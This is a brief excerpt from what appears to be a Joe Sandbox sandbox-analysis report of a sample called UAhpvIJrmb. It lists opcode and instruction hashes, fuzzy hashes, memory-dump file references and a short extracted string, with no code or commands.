                  • Opcode ID: b57601eddd14e9fe86b2c0836bef995a2c4911f385a9463d7de742d36d0bd63b
                  • Instruction ID: 65e08c15317bf532ea6aee1212420b3e198e70ece68456e3e0f0669b1333444f
                  • Opcode Fuzzy Hash: b57601eddd14e9fe86b2c0836bef995a2c4911f385a9463d7de742d36d0bd63b
                  • Instruction Fuzzy Hash: DED092B090992E8EDBA0DF58C8147B9B7F1BB58305F0001F5A01CD22A1DB746A908F40
                  Strings
                  Memory Dump Source
                  • Source File: 00000023.00000002.1789265133.00007FFD9BABF000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BABF000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_35_2_7ffd9babf000_UAhpvIJrmb.jbxd
                  Similarity
                  • API ID:
                  • String ID: ($5$9$@$R$[$e$g
                  • API String ID: 0-3620693125
                  • Opcode ID: 66c964a788afc7eb25be3e3b4f781848413d55b6a805c71ddbb94a87fd62c266
                  • Instruction ID: ec8eec47737bb728ea4c76893d73f0284b07a6cd16f9a99bb1ccdeb65821a245
                  • Opcode Fuzzy Hash: 66c964a788afc7eb25be3e3b4f781848413d55b6a805c71ddbb94a87fd62c266
                  • Instruction Fuzzy Hash: 0951C2B0E0962E8AEBA4DF64C8647E9B7B1AF49305F0041F9D41DA2291DF796A85CF40